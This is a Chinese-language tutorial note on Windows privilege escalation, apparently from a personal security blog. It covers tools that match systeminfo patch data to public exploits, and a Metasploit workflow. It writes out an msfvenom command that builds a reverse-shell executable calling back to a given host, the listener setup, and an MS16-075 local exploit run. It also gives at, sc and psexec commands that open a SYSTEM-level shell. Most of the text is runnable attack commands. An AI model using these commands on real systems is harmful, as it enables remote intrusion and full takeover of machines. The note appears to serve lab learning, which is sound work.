神出鬼没的Enderman

权限提升-Win溢出漏洞及AT&SC&PS提权

windows权限提升

用户及用户组权限划分

windows命令

基于WEB环境下的权限提升

在windows服务器上部署php

systeminfo查看系统信息

Vulmap-windows漏洞扫描工具

• https://github.com/vulmon/Vulmap
• Vulmap-master.zip

• 如果在运行时遇到该问题,需要使用该命令,不太好用

Set-ExecutionPolicy RemoteSigned

WES-NG的使用

• https://github.com/bitsadmin/wesng
• wesng-master.zip

是一种基于 Windows systeminfo 实用程序输出的工具，它提供操作系统易受攻击的漏洞列表，包括对这些漏洞的任何利用。适用于 Windows 操作系统

• wes.py 既适用本地环境，也适用web环境。因为它只需要我们在目标服务器执行systeminfo > 1.txt命令，拿到系统信息（主要是补丁信息）即可，然后我们可以把信息保存在 1.txt文件中，在本机运行wes.py进行测试即可

#只需要获得靶机的systeminfo信息,然后在本地运行脚本获得信息,注意脚本的执行权限
./wes.py ../1.txt -o vuln.csv

windowsVulScan

• https://github.com/chroblert/WindowsVulnScan
• WindowsVulnScan-master.zip

WindowsVulnScan根据软件的名称和版本号来确定是否有 CVE 和公开的 EXP。适用于 Windows 操作系统。前期收集补丁信息时也需要在PS窗口运行，因此只适用于本地环境。但是我们也可以对其进行一些小的修改，让它可以用于web环境。所以也可以说它是一个通用方法。

# author: JC0o0l
# GitHub: https://github.com/chroblert/
可选参数:
  -h, --help            show this help message and exit
  -u, --update-cve      更新CVEKB数据
  -U, --update-exp      更新CVEEXP数据
  -m MODE, --mode MODE  搭配-U使用。更新模式 All:更新所有;Empty:只更新空白的;Error:只更新之前未成功更新的
  -C, --check-EXP       检索具有EXP的CVE
  -n PRODUCTNAME, --productName PRODUCTNAME
                        搭配-C使用。自定义产品名称，如Windows 10
  -N PRODUCTVERSION, --productVersion PRODUCTVERSION
                        搭配-C使用。自定义产品版本，如20H2
  -f FILE, --file FILE  ps1脚本运行后产生的.json文件

先获取当前靶机的漏洞信息,执行的时候遇到点问题

查看自带的文件,也可以自己从systeminfo中获取信息然后写入文件

{"basicInfo":{"windowsProductName":"Microsoft Windows 10 专业版","windowsVersion":"1909"},"KBList":[
    "KB4534132",
    "KB4516115",
    "KB4517245",
    "KB4521863",
    "KB4524569",
    "KB4528759",
    "KB4537759",
    "KB4538674",
    "KB4532693"
]}

• 安装一些python3模块python3 -m pip install requirements.txt
• 运行cve-check.py -u创建CVEKB数据库
• 运行cve-check.py -U更新CVEKB数据库中的hasPOC字段
• 运行cve-check.py -C -f KB.json查看具有公开EXP的CVE

MSF的利用

用于提权需要先获取到shell,生成反弹shell

msfvenom -p windows/meterpreter/reverse_tcp LPORT=1234 LHOST=192.168.50.22 -f exe -o test.exe

然后监听该端口,获取shell

#进入监听模块
use exploit/multi/handler
#设置payload反弹
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1234
show options
run

开启监听后,运行反弹shell文件,获取到shell

也可以在大马上用命令运行

• meterpreter相关命令可以参考该链接https://blog.1997sty.com/archives/2416#toc-Meterpreter%E5%91%BD%E4%BB%A4

利用漏洞进行提权

use windows/local/ms16_075_reflection_juicy
#设置获取到会话的session id
set session 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.50.22
set lport 4444
run

服务器是win2008,正常情况会获得会话,但是返回的提示是成功利用,但是没有获得会话

基于本地环境下的权限提升-AT&SC&PS命令

at提权（针对win7之前的操作系统）

:给系统添加一项作业，在21:26打开
at 21:26 /interactive cmd.exe
:查看作业详情
at
:删除作业
at /del

打开的cmd默认为system权限

sc提权

使用sc命令创建一个syscmd的服务，绑定binPath的路径

sc Create syscmd binPath= "cmd /K start" type= own type= interact

启动这个服务

sc start syscmd

ps提权

pstools是微软官方工具，是为windows提供的第三方工具库,注意，2008要使用psexec64.exe

• https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
• PSTools.zip

psexec.exe -accepteula -s -i -d cmd.exe
psexec.exe -accepteula -s -i cmd.exe